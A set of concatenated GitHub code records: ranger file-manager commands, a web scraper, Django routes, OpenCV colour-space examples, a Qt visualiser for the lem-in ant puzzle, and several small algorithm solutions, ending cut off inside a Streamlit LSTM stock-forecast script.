src)\n\n\nclass aur_mark_new(Command):\n \"\"\"\n :aur_mark_new\n\n Scan directory of seen aurutils repos and tag new packages.\n \"\"\"\n def execute(self):\n seen_dir = (os.environ.get('XDG_DATA_HOME', os.path.expanduser(\"~/.local/share\"))\n + \"/aurutils/view\")\n dir_ = self.fm.thisdir\n dir_.load_content(schedule=False) # force load content, so we can use .files\n dir_.mark_all(False)\n for f in dir_.files:\n if not os.path.exists(os.path.join(seen_dir, f.basename)):\n dir_.mark_item(f, True) # f.mark()\n # dir_.mark_item(f, not os.path.exists(os.path.join(seen_dir, f.basename)))\n\n dir_.load_content()\n\n\nclass mkcd(Command):\n \"\"\"\n :mkcd \n\n Create a directory with the name if it does not exist\n and switch to it.\n \"\"\"\n def execute(self):\n dirname = self.rest(1)\n if not dirname:\n self.fm.notify(\"No dirname given!\", bad=True)\n return\n target = os.path.join(self.fm.thisdir.path, os.path.expanduser(dirname))\n os.makedirs(target, exist_ok=True)\n self.fm.cd(target)\n\n def tab(self, tabnum):\n return self._tab_directory_content()\n","repo_name":"FichteFoll/dotfiles","sub_path":"ranger/.config/ranger/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":7553,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"75"} +{"seq_id":"2379121414","text":"import time\nfrom selenium import webdriver\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport os\n\ndef download_image(url, save_path):\n response = requests.get(url, stream=True)\n if response.status_code == 200:\n with open(save_path, 'wb') as f:\n for chunk in response.iter_content(chunk_size=8192):\n f.write(chunk)\n else:\n print(f\"Failed to download image from {url}\")\n\nif not os.path.exists(\"Images\"):\n os.mkdir(\"Images\")\n\ndriver = 
webdriver.Chrome()\ndriver.get(\"https://aitoptools.com/\")\n\nscroll_pause_time = 2\ntools_per_batch = 12 \nbatch_count = 0\n\ntry:\n    with open(\"data.json\", 'r') as json_file:\n        scraped_data = json.load(json_file)\n        scraped_tools_urls = set(item['Name'] for item in scraped_data)\nexcept FileNotFoundError:\n    scraped_data = []\n    scraped_tools_urls = set() \n\nwhile True:\n    batch_count += 1 \n    page_source = driver.page_source\n    soup = BeautifulSoup(page_source, \"html.parser\")\n    tools_in_view = soup.find_all('div', class_=\"elementor elementor-43\")\n    \n    for tool in tools_in_view:\n        tool_name = tool.find('h2', class_=\"elementor-heading-title elementor-size-default\").text.strip()\n        if tool_name in scraped_tools_urls:\n            continue\n        scraped_tools_urls.add(tool_name) \n        name = tool.find('h2', class_=\"elementor-heading-title elementor-size-default\").text.strip()\n        try:\n            price_div= tool.find('div', attrs={\"data-id\":\"600e028\"})\n            price = price_div.find('div', class_=\"jet-listing-dynamic-field__content\").text.strip()\n        except:\n            price = None \n        try:\n            category_div= tool.find('div', attrs={\"data-id\":\"e33aa69\"})\n            category = category_div.find('div', class_=\"jet-listing-dynamic-field__content\").text.strip()\n        except:\n            category = None \n        download_div=tool.find(\"div\", attrs={\"data-id\":\"a27d6a1\"})\n        download = download_div.find('div', class_=\"jet-listing-dynamic-field__content\").text.strip() \n        toollink=[]\n        toollink1=[]\n        for link in tool.find_all('a', href=True): \n            toollink.append(link['href']) \n            toollink1.append(link['href'])\n        print(\"Hurray onto the next...\", {len(toollink1)})\n        for url in toollink1:\n            r=requests.get(url)\n            soup = BeautifulSoup(r.content, 'html.parser')\n\n            website_div = soup.find('div', attrs={\"data-id\":\"7bcc280\"})\n            try:\n                website = website_div.find('a', href=True)['href']\n            except:\n                website = None\n            reviews = soup.find('div', class_='elementor-star-rating__title').text.strip(\"()\")\n            ratings = soup.find('div', class_='elementor-star-rating').span.text.strip()\n            \n            tags = [] \n            tags_div = soup.find('div', attrs={\"data-id\":\"d100745\"})\n            tags_links = tags_div.find_all('a', class_='jet-listing-dynamic-terms__link')\n            tags = [link.text.strip() for link in tags_links]\n\n            features = []\n            features_div = soup.find('div', attrs={\"data-id\":\"5217d73\"})\n            features_links = features_div.find_all('a', class_='jet-listing-dynamic-terms__link')\n            features = [link.text.strip() for link in features_links]\n            \n            imgSrc = soup.find('div', class_='jet-listing jet-listing-dynamic-image').img['data-src'] \n            desc = soup.find_all('p')[2].text.strip() \n            \n            data = {\n                \"Name\": name,\n                \"Price\": price,\n                \"Category\": category,\n                \"Downloads\": download,\n                \"Website\": website,\n                \"Review\": reviews,\n                \"Rating\": ratings,\n                \"Tags\": tags,\n                \"Features\": features,\n                \"ImgSrc\": imgSrc,\n                \"Desc\":desc, \n            }\n            scraped_data.append(data)\n            filename = os.path.basename(imgSrc)\n            save_path = os.path.join(\"Images\", filename)\n            download_image(imgSrc, save_path)\n    with open(\"data.json\", 'w') as json_file:\n        json.dump(scraped_data, json_file)\n    \n    driver.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n    time.sleep(scroll_pause_time)\n    \n\n    if len(scraped_tools_urls)==5108:\n        break \n\ndriver.quit()","repo_name":"NjengaBen/webscrapingwithselenium","sub_path":"newscraper.py","file_name":"newscraper.py","file_ext":"py","file_size_in_byte":4451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
+{"seq_id":"15521968986","text":"from django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n    url(r'^$',views.list,name='index'),\n\n    url(r'^create/$',views.create,name='create'),\n    url(r'^update/(?P\\d+)/$',views.update,name='update'),\n    url(r'^delete/(?P\\d+)/$',views.delete,name='delete'),\n    url(r'^reporte/$',views.ReportePersonalizadoExcel.as_view(),name='reporte'),\n]","repo_name":"Jose-Guachun/queryset","sub_path":"crud/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"42286465624","text":"# coding:utf-8\n# opencv_04 color spaces\n# author:Qinyuan\n\nfrom cv2 import cv2\nimport numpy as np\n\n##########\n### Example 1 ##\nBGR = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\baby_200.jpg\")\ncv2.imshow(\"BGR\",BGR)\n# convert to RGB\nRGB = cv2.cvtColor(BGR,cv2.COLOR_BGR2RGB)\ncv2.imshow(\"RGB\",RGB)\n# convert to HSV\nHSV = cv2.cvtColor(BGR,cv2.COLOR_BGR2HSV)\ncv2.imshow(\"HSV\",HSV)\n# convert to GRAY (grayscale)\nGRAY = cv2.cvtColor(BGR,cv2.COLOR_BGR2GRAY)\ncv2.imshow(\"GRAY\",GRAY)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### Example 2 ##\n# create a three-channel image pixel value\nGreen_BGR = np.zeros([1,1,3],dtype=np.uint8)\n# make the G (green) channel pure green by setting it to 255\nGreen_BGR[0,0,1]=255\n# convert to the HSV color space\nGreen_HSV = cv2.cvtColor(Green_BGR,cv2.COLOR_BGR2HSV)\n# print the corresponding values\nprint(\"BGR=\",Green_BGR)\nprint(\"HSV\",Green_HSV)\n\n##########\n### Example 3 ##\nimg = np.random.randint(0,256,size=[3,3],dtype=np.uint8)\nmin = 100\nmax = 200\ndst = cv2.inRange(img,min,max)\nprint(\"img=\\n\",img)\nprint(\"dst=\\n\",dst)\n\n##########\n### Example 4 ##\nimg = np.random.randint(0,256,size=[5,5],dtype=np.uint8)\n# set the lower pixel bound\nmin = 100\n# set the upper pixel bound\nmax = 200\n# flag the pixels that fall inside the range\nmask = cv2.inRange(img,min,max)\n# bitwise AND to keep the pixel values inside the range\nROI = cv2.bitwise_and(img,img,mask=mask)\nprint(\"img=\\n\",img)\nprint(\"mask=\\n\",mask)\nprint(\"ROI=\\n\",ROI)\n\n##########\n### Example 5 ##\nBGR = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\baby_200.jpg\")\ncv2.imshow(\"BGR\",BGR)\n# convert to HSV\nHSV = cv2.cvtColor(BGR,cv2.COLOR_BGR2HSV)\ncv2.imshow(\"HSV\",HSV)\n############ specify the range of blue values ##############\nmin_blue = np.array([0,50,50])\nmax_blue = np.array([10,255,255])\n# determine the blue region\nmask = cv2.inRange(HSV,min_blue,max_blue)\ncv2.imshow(\"mask\",mask)\n# extract the blue region with a bitwise AND\nresult = cv2.bitwise_and(BGR,BGR,mask=mask)\ncv2.imshow(\"result\",result)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### Example 6 ##\nimg = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\face.jpg\")\ncv2.imshow(\"img\",img)\nHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n# split the HSV color space into channels\nh,s,v = cv2.split(HSV)\n# set the hue lower and upper bounds\nmin_H = 5\nmax_H = 170\n# threshold the hue range\nmask_h = cv2.inRange(h,min_H,max_H)\n# set the saturation lower and upper bounds\nmin_s = 25\nmax_s = 166\n# threshold the saturation range\nmask_s = cv2.inRange(s,min_s,max_s)\n# get the mask of the facial skin tone\nmask = mask_h & mask_s\n# get the final result image ROI\nROI = cv2.bitwise_and(img,img,mask = mask)\ncv2.imshow(\"ROI\",ROI)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### Example 7 ##\nimg = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\face.jpg\")\ncv2.imshow(\"img\",img)\nHSV = cv2.cvtColor(img,cv2.COLOR_BGR2HSV)\n# split the HSV color space into channels\nh,s,v = cv2.split(HSV)\n# set the brightness channel V to 255 everywhere\nv[:,:]=255\n# merge the channels\nhsv = cv2.merge([h,s,v])\nart = cv2.cvtColor(hsv,cv2.COLOR_HSV2BGR)\ncv2.imshow(\"art\",art)\ncv2.waitKey()\ncv2.destroyAllWindows()\n\n##########\n### Example 8 ##\nimg = cv2.imread(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\baby_200.jpg\")\ncv2.imshow(\"BGR\",img)\n# convert to four-channel BGRA\nalpha = 
cv2.cvtColor(img,cv2.COLOR_BGR2BGRA)\n# split the image into channels\nb,g,r,a = cv2.split(alpha)\n# set a to 255, same as the original image\na[:,:]=255\n# merge the channels\nalp_255 = cv2.merge([b,g,r,a])\ncv2.imshow(\"255\",alp_255)\n# set a to 125\na[:,:] = 125\nalp_125 = cv2.merge([b,g,r,a])\ncv2.imshow(\"125\",alp_125)\n# set a to 0\na[:,:] = 0\nalp_0 = cv2.merge([b,g,r,a])\ncv2.imshow(\"0\",alp_0)\n# save the images locally\ncv2.imwrite(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\alpha\\alp_255.png\",alp_255)\ncv2.imwrite(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\alpha\\alp_0.png\",alp_0)\ncv2.imwrite(r\"F:\\USER\\Desktop\\Benny\\benny\\opencv\\picture\\alpha\\alp_125.png\",alp_125)\ncv2.waitKey()\ncv2.destroyAllWindows()\n","repo_name":"Qin-Yuan/python-opencv","sub_path":"opencv_base/opencv_04.py","file_name":"opencv_04.py","file_ext":"py","file_size_in_byte":3736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"25420249087","text":"import sys\n\nfrom dataclasses import dataclass\nimport math\nfrom collections import defaultdict\nfrom itertools import groupby\nfrom operator import attrgetter\n\nfrom PySide2.QtWidgets import QApplication, QOpenGLWidget, QVBoxLayout, QLabel, QSizePolicy\nfrom PySide2.QtGui import QPainter, QPen, 
QBrush, QColor, QPainterPath, QTransform, QStaticText\nfrom PySide2.QtCore import QObject, QRect, QRectF, Qt, QPoint, QPointF, Slot, Signal\n\nfrom lemin_vis.animation_control import SimulationState, AnimationControl\n\nMIN_ZOOM = 0.01\nMAX_ZOOM = 200\n\n\n@dataclass\nclass Camera:\n viewport: QOpenGLWidget\n pos: QPointF\n zoom: float\n\n def fit_solution_in_view(self, solution):\n if not solution.rect:\n return\n\n solution_rect = QRect(QPoint(solution.rect.left, solution.rect.top),\n QPoint(solution.rect.right, solution.rect.bottom))\n\n viewport_rect = self.viewport.rect()\n\n # compute zoom level\n if solution_rect.width() > solution_rect.height():\n zoom = viewport_rect.width() / solution_rect.width() if viewport_rect.width() else 1\n else:\n zoom = viewport_rect.height() / solution_rect.height() if viewport_rect.height() else 1\n\n self.zoom = 0.80 * zoom if zoom else 1\n self.zoom = clamp(self.zoom, MIN_ZOOM, MAX_ZOOM) # limit zoom level\n\n # center view on rect center\n self.pos = -QPointF(solution_rect.center())\n\n\ndef clamp(v, smallest, largest):\n \"limit value on both sides\"\n return max(smallest, min(v, largest))\n\n\nclass View(QOpenGLWidget): # inherit from QOpenGLWidget to enable opengl backend for QPainter\n room_size = 28\n ant_size = 16\n\n def __init__(self, map, solution, parent=None):\n super().__init__(parent)\n self.setWindowTitle(\"lemin42 visual\")\n\n self.camera = Camera(self, QPointF(0, 0), 1)\n self.mouse_last_pos = QPoint(0, 0)\n self.map = map\n self.solution = solution\n self.steps = 0\n\n self.create_pens()\n self.create_link_layer()\n self.create_solution_paths()\n\n self.anim_control = AnimationControl(solution)\n\n self.create_ui()\n\n self.camera.fit_solution_in_view(solution)\n\n # start redraw timer\n self.startTimer(1000 / 60) # 60 fps\n\n def create_link_layer(self):\n \"\"\"\n optimization: store all links in QPainterPath object\n to draw it in one call\n \"\"\"\n\n self.link_layer = link_layer = QPainterPath()\n\n for link in self.map.links:\n from_ = link.from_.coords\n to_ = link.to_.coords\n\n link_layer.moveTo(from_.x, from_.y)\n link_layer.lineTo(to_.x, to_.y)\n\n def create_solution_paths(self):\n self.solution_paths = []\n\n # group ants by paths\n self.path_ants = defaultdict(list)\n for ant in self.solution.ants.values():\n self.path_ants[ant.path].append(ant)\n\n # add ant paths to view\n for path in self.path_ants:\n qpath = QPainterPath()\n for link in path.links:\n from_ = link.from_.coords\n to_ = link.to_.coords\n\n qpath.moveTo(from_.x, from_.y)\n qpath.lineTo(to_.x, to_.y)\n\n self.solution_paths.append(qpath)\n\n def create_pens(self):\n pen = QPen(QColor(\"#33434B\"), 3)\n pen.setCosmetic(True) # makes pen size zoom independent\n self.link_pen = pen\n\n pen = QPen(QColor(\"#5A667A\"), self.room_size)\n pen.setCosmetic(True) # makes pen size zoom independent\n self.room_pen = pen\n\n pen = QPen(QColor(\"#FF0266\"), self.ant_size)\n pen.setCosmetic(True) # makes pen size zoom independent\n self.ant_pen = pen\n\n pen = QPen(QColor(\"#AAAAAA\"), 1)\n self.text_pen = pen\n\n pen = QPen(QColor(\"#20FF20\"), 1)\n self.special_text_pen = pen\n\n # create path pens\n ant_colors = [\"#FF008D\", \"#FF00FF\", \"#FFE100\", \"#FF0000\"]\n\n self.solution_path_pens = [QPen(QColor(color).darker(100), 3)\n for color in ant_colors]\n\n for pen in self.solution_path_pens:\n pen.setCosmetic(True)\n\n self.ant_pens = [QPen(QColor(color), self.ant_size)\n for color in ant_colors]\n\n for pen in self.ant_pens:\n pen.setCosmetic(True)\n\n def 
create_ui(self):\n alignTop = Qt.AlignTop | Qt.AlignLeft\n alignBottom = Qt.AlignBottom | Qt.AlignLeft\n\n layout = QVBoxLayout()\n self.setLayout(layout)\n\n # add error label if any errors from parsing\n if self.map.error or self.solution.error:\n error_lbl = QLabel(self.map.error or self.solution.error)\n error_lbl.setObjectName(\"error\")\n layout.addWidget(error_lbl, 0, alignTop)\n\n self.setStyleSheet(\"\"\"\n QLabel {color: #eeeeee; font: 20px;}\n QLabel#error {color: #e91e63; font: 18px;}\n QLabel#second {color: #aaaaaa; font: 15px;}\n \"\"\")\n\n map_params_label = QLabel(\n f\"{self.map.number_of_ants} ants\"\n f\" {len(self.map.rooms)} rooms\"\n f\" {len(self.map.links)} links \")\n\n map_params_label.setObjectName('second')\n layout.addWidget(map_params_label, 0, alignTop)\n\n state_label = QLabel(\"playing\")\n layout.addWidget(state_label, 0, alignTop)\n\n def on_state_changed(value):\n mapping = {\n SimulationState.playing: 'playing',\n SimulationState.paused: 'paused'\n }\n\n state_label.setText(mapping[value])\n\n self.anim_control.stateChanged.connect(on_state_changed)\n\n step_label = QLabel(\"\")\n layout.addWidget(step_label, 0, alignTop)\n\n def on_step_changed(value):\n step_label.setText(\n f'step {value} / {self.solution.number_of_steps - 1}')\n\n self.anim_control.stepChanged.connect(on_step_changed)\n on_step_changed(0)\n\n descr_label = QLabel(\"\"\"\n Space to play / pause
    \n D next step
    \n A previous step\n \"\"\")\n descr_label.setObjectName('second')\n layout.addWidget(descr_label, 1, alignBottom)\n\n def timerEvent(self, ev):\n self.update() # schedule widget repaint\n self.anim_control.update() # update ant animation\n\n def paintEvent(self, paintEvent):\n painter = QPainter(self)\n\n font = painter.font()\n font.setPixelSize(14)\n font.setBold(True)\n painter.setFont(font)\n\n # clear background\n painter.setBackground(QColor(\"#1D212D\"))\n painter.eraseRect(self.rect())\n\n self.apply_camera(painter)\n\n self.draw_links(painter)\n\n self.draw_rooms(painter)\n\n self.draw_solution_paths(painter)\n\n self.draw_ants(painter)\n\n # reset transform\n painter.resetMatrix()\n\n self.draw_room_names(painter)\n\n def mousePressEvent(self, ev):\n left_button_pressed = bool(ev.buttons() & Qt.LeftButton)\n\n if left_button_pressed:\n self.mouse_last_pos = ev.pos()\n\n def mouseMoveEvent(self, ev): # mouse move only triggered when a mouse button pressed\n dmouse = ev.pos() - self.mouse_last_pos\n self.camera.pos += self.zoom_reverse(QPointF(dmouse))\n self.mouse_last_pos = ev.pos()\n\n def wheelEvent(self, ev): # mouse wheel\n if ev.delta() < 0:\n self.camera.zoom /= 1.2\n else:\n self.camera.zoom *= 1.2\n\n # limit camera zoom level\n self.camera.zoom = clamp(self.camera.zoom, MIN_ZOOM, MAX_ZOOM)\n\n def keyPressEvent(self, ev):\n if ev.key() == Qt.Key_Space:\n self.anim_control.play_or_pause()\n elif ev.key() == Qt.Key_D:\n self.anim_control.rewind_forward()\n elif ev.key() == Qt.Key_A:\n self.anim_control.rewind_backward()\n\n def apply_camera(self, painter):\n mvp = self.mvp()\n painter.setTransform(mvp)\n\n def mvp(self):\n view_center = self.rect().center()\n mvp = QTransform()\n mvp.translate(view_center.x(), view_center.y())\n mvp.scale(self.camera.zoom, self.camera.zoom)\n mvp.translate(self.camera.pos.x(), self.camera.pos.y())\n return mvp\n\n def zoom_reverse(self, x):\n return x/self.camera.zoom\n\n def draw_links(self, painter):\n painter.setPen(self.link_pen)\n painter.drawPath(self.link_layer)\n\n def draw_solution_paths(self, painter):\n pen_num = len(self.solution_path_pens)\n for i, path in enumerate(self.solution_paths):\n painter.setPen(self.solution_path_pens[i % pen_num])\n painter.drawPath(path)\n\n def draw_rooms(self, painter):\n painter.setPen(self.room_pen)\n for room in self.map.rooms.values():\n painter.drawPoint(room.coords.x, room.coords.y)\n\n def draw_ants(self, painter):\n if self.solution.error:\n return\n\n num_of_pens = len(self.solution_path_pens)\n for i, ants_on_path in enumerate(self.path_ants.values()):\n painter.setPen(self.ant_pens[i % num_of_pens])\n for ant in ants_on_path:\n painter.drawPoint(QPointF(ant.x, ant.y))\n\n def draw_room_names(self, painter):\n if self.map.error:\n return\n\n # manually transform text position to draw text unaffected by zoom\n painter.setPen(self.text_pen)\n mvp = self.mvp()\n rect = QRectF(-100, self.room_size /\n 2, 200, self.room_size)\n\n for room in self.solution.all_rooms:\n screen_c = mvp.map(QPointF(room.coords.x, room.coords.y))\n painter.drawText(rect.translated(screen_c),\n Qt.AlignCenter, room.name)\n\n start_room = self.map.start_room\n start_coord = mvp.map(\n QPointF(start_room.coords.x, start_room.coords.y))\n\n end_room = self.map.end_room\n end_coord = mvp.map(QPointF(end_room.coords.x, end_room.coords.y))\n\n painter.setPen(self.special_text_pen)\n painter.drawText(rect.translated(start_coord),\n Qt.AlignCenter, start_room.name + \"\\n\")\n\n painter.drawText(rect.translated(\n 
end_coord), Qt.AlignCenter, end_room.name + \"\\n\")\n\n\ndef init_and_run(map, solution):\n # Create the Qt Application\n app = QApplication()\n # Create and show the form\n view = View(map, solution)\n view.resize(800, 600)\n view.show()\n # Run the main Qt loop\n sys.exit(app.exec_())\n","repo_name":"arptra/lem-in","sub_path":"lemin42-visual/lemin_vis/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":10899,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"73312933681","text":"p1 = list(input().split())\np2 = list(input().split())\n\nd1 = {}\nd2 = {}\nd3 = {}\n\n\nlist1 = []\n\n\nfor i in range(1,len(p1),2):\n if float(p1[i+1]) !=0:\n d1[int(p1[i])] = float(p1[i+1])\nfor i in range(1,len(p2),2):\n if float(p2[i+1]) !=0:\n d2[int(p2[i])] = float(p2[i+1])\n \nfor k1 in d1:\n for k2 in d2:\n temp = d3.get(k1+k2,0) + d1.get(k1)*d2.get(k2)\n if temp !=0:\n d3[k1+k2] = round(temp,1)\n else:\n del d3[k1+k2]\nlist1 = [str(len(d3))] \nif len(d3) != 0: \n for i in sorted(d3.keys(),reverse = True):\n list1.append(str(i))\n list1.append(str(d3[i]))\nelse:\n list1.append(str(0))\n list1.append(str(0))\n\nprint(' '.join(list1))","repo_name":"francislinking/PTA-codes","sub_path":"PAT Advance/PAT_A1009.py","file_name":"PAT_A1009.py","file_ext":"py","file_size_in_byte":733,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41809614776","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\n# 0-1 Knapsack Problem using Dynamic Programming.\n# Using Tabulation Method (Filling table in Bottom-up manner)\n# Time Complexity is O(nW)\n\n\n# In[32]:\n\n\ndef knapsack(maxW, weight, val, items):\n # Initializing the table[][] with 0s\n table=[ [0 for x in range(maxW+1)] for x in range(items+1) ] \n \n # ci = current Item\n # cw = current Weight\n for ci in range(items+1):\n for cw in range(maxW+1):\n \n if ci ==0 or cw == 0: # Filling 1st row and column with 0\n table[ci][cw]=0\n \n elif weight[ci-1] <= cw: # if the current weight can be included in the bag capacity\n val_CI = val[ci-1] # Value of Current Item\n val_RW = cw - weight[ci-1] # Max Value of Remaining weight from the current weight\n including = val_CI + table[ci-1][val_RW] # Including current item\n notIncluding = table[ci-1][cw] # Not Including current item\n \n table[ci][cw] = max(including, notIncluding)\n \n # -------------- OR IN 1 LINE --------------#\n \n # table[ci][cw] = max(val[ci-1] + table[ci-1][cw-weight[ci-1]] , table[ci-1][cw])\n \n else:\n table[ci][cw]= table[ci-1][cw] \n \n # The last value in the table is our final answer\n print(\"Answer is : \" , table[ci][cw])\n # Printing the table for reference\n print(\"\\n\",table)\n\n\n# In[33]:\n\n\nval = [60,100,120]\nweight = [10,20,30]\nmaxW = 50\nitems = len(val)\nknapsack(maxW, weight, val, items)\n\n\n# In[ ]:\n\n\n# stay Tuned :)\n\n","repo_name":"Harshhg/python_data_structures","sub_path":"Dynamic Programming/py code/0-1 Knapsack_Problem_DP.py","file_name":"0-1 Knapsack_Problem_DP.py","file_ext":"py","file_size_in_byte":1749,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"34524231362","text":"class Solution:\r\n def countPoints(self, rings: str) -> int:\r\n d = {}\r\n for i in range(0,len(rings)-1,2):\r\n if rings[i+1] in d.keys():\r\n d[rings[i+1]].add(rings[i])\r\n else:\r\n d.__setitem__(rings[i+1],set(rings[i]))\r\n ans = 0\r\n for i in d.values():\r\n if len(i)==3:\r\n 
ans+=1\r\n return ans","repo_name":"srawan-meesala/leetcode-solutions","sub_path":"Rings And Rods.py","file_name":"Rings And Rods.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37549832923","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\n\ndef dfs(x, arr):\n global cnt\n if len(arr) == 7:\n cnt.append(arr)\n return\n for i in range(x, 25):\n if not visit[i]:\n visit[i] = 1\n dfs(i, arr+[i])\n visit[i] = 0\n\n\nboard = [[i for i in input()] for _ in range(5)]\nidx = [(-1, 0), (1, 0), (0, -1), (0, 1)]\ncnt = []\nvisit = [0]*25\ndfs(0, [])\nres = 0\nfor check in cnt:\n nums = [[0]*5 for _ in range(5)]\n xx = check[0] // 5\n yy = check[0] % 5\n path = board[xx][yy]\n queue = [(xx, yy)]\n nums[xx][yy] = 1\n flag = 0\n for x, y in queue:\n for dx, dy in idx:\n if 0 <= x+dx < 5 and 0 <= y+dy < 5 and nums[x+dx][y+dy] == 0 and 5*(x+dx) + y+dy in check:\n path += board[x+dx][y+dy]\n if path.count('Y') >= 4:\n flag = 1\n break \n queue.append((x+dx, y+dy))\n nums[x+dx][y+dy] = 1\n if flag == 1:\n break\n if flag == 0 and len(queue) == 7:\n res += 1\nprint(res)","repo_name":"seoul-ssafy-class-2-studyclub/hyeonhwa","sub_path":"baekjoon/1941_소문난칠공주.py","file_name":"1941_소문난칠공주.py","file_ext":"py","file_size_in_byte":1081,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"28971866769","text":"# LEETDCODE@ 474. Ones and Zeroes\n#\n# 1) Backpack problem\n#\n# 2) Because we encounter one more condition is that 0s & 1s, we have\n# to extend the 2-d dp to 3-d dp.\n#\n# --END--\n\n\ndef findMaxForm(self, strs, m, n):\n counter = []\n for s in strs:\n counter.append([0, 0])\n for c in s:\n if c == '0':\n counter[-1][0] += 1\n else:\n counter[-1][1] += 1\n l = len(strs)\n\n # 1) dp initialization\n dp = [[[0 for j in range(n + 1)] for i in range(m + 1)] for k in range(l + 1)]\n for k in range(1, l + 1):\n for i in range(m + 1):\n for j in range(n + 1):\n if i - counter[k - 1][0] >= 0 and j - counter[k - 1][1] >= 0:\n dp[k][i][j] = max(dp[k][i][j], dp[k - 1][i - counter[k - 1][0]][j - counter[k - 1][1]] + 1)\n dp[k][i][j] = max(dp[k][i][j], dp[k - 1][i][j])\n return dp[l][m][n]\n","repo_name":"Lancher/coding-challenge","sub_path":"dp/*ones_zeros.py","file_name":"*ones_zeros.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"11987244583","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport math\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.preprocessing import MinMaxScaler\nfrom tensorflow import keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import LSTM\nimport plotly.graph_objects as go\nimport plotly.express as px\nimport matplotlib.pyplot as plt \nfrom datetime import datetime, timedelta\nfrom collections import deque\n\ndef forecast(df):\n\n df_1=df.reset_index()['Close']\n scaler = MinMaxScaler(feature_range=(0,1))\n arr = np.array(df_1).reshape(-1,1)\n df_1 = scaler.fit_transform(arr)\n\n #train test splitting\n training_size = int(len(df_1)*0.70)\n test_size = len(df_1) - training_size\n train_data,test_data = df_1[0:training_size,:],df_1[training_size:len(df_1),:1]\n\n # convert an array of values into a dataset matrix\n def create_dataset(dataset, time_step=1):\n dataX, dataY = [], []\n for i in range(len(dataset)-time_step-1):\n 
a = dataset[i:(i+time_step), 0] ###i=0, 0,1,2,3-----99 100 \n dataX.append(a)\n dataY.append(dataset[i + time_step, 0])\n return np.array(dataX), np.array(dataY)\n \n time_step = 100\n X_train, y_train = create_dataset(train_data, time_step)\n X_test, ytest = create_dataset(test_data, time_step)\n\n # reshape input to be [samples, time steps, features] which is required for LSTM\n X_train =X_train.reshape(X_train.shape[0],X_train.shape[1] , 1)\n X_test = X_test.reshape(X_test.shape[0],X_test.shape[1] , 1)\n\n model=Sequential()\n model.add(LSTM(50,return_sequences=True,input_shape=(X_train.shape[1],1)))\n model.add(LSTM(50,return_sequences=True))\n model.add(LSTM(50))\n model.add(Dense(1))\n model.compile(loss='mean_squared_error',optimizer='adam')\n\n model.fit(X_train,y_train,validation_data=(X_test,ytest),epochs=1,batch_size=64,verbose=1)\n\n ### Lets Do the prediction and check performance metrics\n train_predict=model.predict(X_train)\n test_predict=model.predict(X_test)\n\n ##Transformback to original form\n train_predict=scaler.inverse_transform(train_predict)\n test_predict=scaler.inverse_transform(test_predict)\n\n st.subheader(\"Mean Squared :red[Error].\")\n st.markdown(\"#\")\n col1, col2 = st.columns(2)\n col1.metric(\"Train Prediction\",f\"{round(math.sqrt(mean_squared_error(y_train,train_predict)))}\",\"- Error\")\n col2.metric(\"Test Prediction\",f\"{round(math.sqrt(mean_squared_error(ytest,test_predict)))}\",\"- Error\")\n st.markdown(\"#\")\n # st.info(math.sqrt(mean_squared_error(y_train,train_predict)))\n # st.info(math.sqrt(mean_squared_error(ytest,test_predict)))\n\n # shift train predictions for plotting\n look_back=100\n trainPredictPlot = np.empty_like(df_1)\n trainPredictPlot[:, :] = np.nan\n trainPredictPlot[look_back:len(train_predict)+look_back, :] = train_predict\n # shift test predictions for plotting\n testPredictPlot = np.empty_like(df_1)\n testPredictPlot[:, :] = np.nan\n testPredictPlot[len(train_predict)+(look_back*2)+1:len(df_1)-1, :] = test_predict\n\n # plot baseline and predictions\n # plt.plot(scaler.inverse_transform(df_1))\n # plt.plot(trainPredictPlot)\n # plt.plot(testPredictPlot)\n # plt.show()\n\n # fig = go.Figure()\n # trace1 = px.line(scaler.inverse_transform(df_1))\n # trace2 = px.line(trainPredictPlot)\n # trace2.update_traces(line_color='orange')\n # trace3 = px.line(testPredictPlot)\n # trace3.update_traces(line_color='green')\n # fig.add_trace(trace1.data[0])\n # fig.add_trace(trace2.data[0])\n # fig.add_trace(trace3.data[0])\n # fig.update_layout(showlegend=False)\n # 